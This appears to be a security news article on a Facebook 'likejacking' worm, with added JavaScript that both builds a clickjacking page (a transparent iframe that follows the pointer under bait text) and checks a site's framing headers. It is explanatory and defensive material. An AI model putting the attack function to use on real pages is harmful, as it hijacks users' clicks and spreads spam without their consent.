Sophos, an IT security and data protection firm, has reported that Facebook is under attack by a phenomenon called “clickjacking”, which is spreading ‘like’ fire. Is it really harmful? Nothing reported so far, beyond the fact that the affected user will apparently ‘like’ some inane external links. Affected users, however, have only themselves to blame. What did they do to deserve it?
Well, they visited a friend’s profile page and clicked one of the following external links, which appeared as something the friend had ‘liked’, to read more about them:
“LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE.”
“This man takes a picture of himself EVERYDAY for 8 YEARS!!”
“This Girl Has An Interesting Way Of Eating A Banana, Check It Out!”
What happens next is that the user is taken to a near-blank page with a single line of text reading ‘Click here to continue’. It makes no difference whether the user clicks on that text or anywhere else: an invisible iframe containing Facebook’s ‘Like’ button is positioned under the mouse pointer, so any click on the page lands on that button and publishes the very same external link to the user’s own profile page, thereby propagating the worm. Are we wary just yet? Yup, we don’t want to be caught dead liking something as boring as a man photographing himself daily, or a girl eating suggestively shaped fruit. If you have been caught by this ‘clickjacking’ attack, don’t worry: you can simply delete the offending links from your news feed, and remove the offending pages from the ‘Likes and interests’ section under the ‘Info’ tab of your profile.
Here’s what Sophos’ Senior Technology Consultant, Graham Cluley, has to say about it: “What the hackers have done is really sneaky. They hide an invisible button - using a hidden iFrame - under your mouse, so wherever you click your mouse-press is hijacked, secretly clicking on a button which tells Facebook that you 'like' the webpage. This then gets published on your own Facebook page and shared with your online friends, resulting in the link spreading virally. Some of the pages ended up with hundreds of thousands of fans as a result. Facebook needs to tighten up the way it handles the 'liking' of external webpages before it is more widely abused by malicious hackers and spammers.”
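To make the mechanism described above and in Cluley’s account concrete, here is an added example (not code from the article, from Sophos, or from the attackers): the first function reconstructs the shape of a ‘likejacking’ page, with a bait line of text and a fully transparent iframe that follows the pointer so that every click lands on the framed button; the second is the check a site owner can run against their own HTTP response headers to learn whether their pages can be framed by a third party at all. The widget URL, frame size and sample headers are placeholders chosen for the example. Note the caveat this attack turns on: Facebook’s ‘Like’ button is deliberately embeddable, so a refuse-to-be-framed header on the button itself is not an option for Facebook, which is why Cluley points at how the site handles ‘liking’ rather than at framing headers.

```javascript
// Added example, not from the article. Placeholder widget URL and
// button dimensions are assumptions, not values reported by Sophos.

// 1. The attacker's side: an HTML page whose only visible content is the
//    bait text, plus an opacity:0 iframe that is kept centred under the
//    mouse pointer so that a click anywhere on the page hits the framed
//    'Like' button instead of the bait text.
function buildLikejackPage(targetUrl) {
  const w = 90, h = 25; // assumed size of the framed button (placeholder)
  return `<!doctype html>
<html><body>
<p>Click here to continue</p>
<iframe id="jack" src="${targetUrl}" scrolling="no"
  style="position:absolute;opacity:0;border:0;z-index:10;width:${w}px;height:${h}px">
</iframe>
<script>
  // Re-position the invisible frame on every mouse move; the user sees
  // only the bait text, but the button is always under the pointer.
  document.addEventListener('mousemove', function (e) {
    var f = document.getElementById('jack');
    f.style.left = (e.pageX - ${w / 2}) + 'px';
    f.style.top  = (e.pageY - ${h / 2}) + 'px';
  });
</script>
</body></html>`;
}

// 2. The defender's side: given a map of response headers, report what the
//    browser will do when a third party tries to frame the page.
//    Returns 'deny', 'sameorigin', 'allowlist' or 'frameable'.
//    Browsers that support CSP frame-ancestors ignore X-Frame-Options when
//    both are present, so the CSP directive is evaluated first.
function framingPolicy(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers || {})) h[k.toLowerCase()] = String(v);

  const csp = h['content-security-policy'] || '';
  const m = csp.match(/frame-ancestors\s+([^;]+)/i);
  if (m) {
    const sources = m[1].trim().split(/\s+/)
      .map(s => s.replace(/^'|'$/g, '').toLowerCase());
    if (sources.length === 1 && sources[0] === 'none') return 'deny';
    if (sources.length === 1 && sources[0] === 'self') return 'sameorigin';
    return 'allowlist'; // specific origins may frame it; everyone else may not
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return 'deny';
  if (xfo === 'SAMEORIGIN') return 'sameorigin';
  return 'frameable'; // no framing restriction at all: clickjackable
}

// Constructed sample responses (not captured from any real site).
const SAMPLE_RESPONSES = {
  unprotected: {},
  legacy:      { 'X-Frame-Options': 'SAMEORIGIN' },
  modern:      { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'",
                 'X-Frame-Options': 'SAMEORIGIN' },
  partner:     { 'Content-Security-Policy': "frame-ancestors 'self' https://partner.example" },
};

// Evaluate every sample and return the verdicts keyed by name.
function auditSamples() {
  const out = {};
  for (const [name, hdrs] of Object.entries(SAMPLE_RESPONSES)) out[name] = framingPolicy(hdrs);
  return out;
}

if (typeof module !== 'undefined') {
  module.exports = { buildLikejackPage, framingPolicy, auditSamples, SAMPLE_RESPONSES };
}
```

The header check is a test for the site being framed, not for the site doing the framing: a page whose response comes back as ‘frameable’ can be laid under a bait page exactly as the article describes. It also shows why the attack in the article is hard to stop from the embedded side alone: a button whose whole purpose is to be embedded on other people’s pages cannot ship a ‘deny’ policy, so the service behind it has to treat clicks arriving from an invisible, pointer-tracking frame with suspicion.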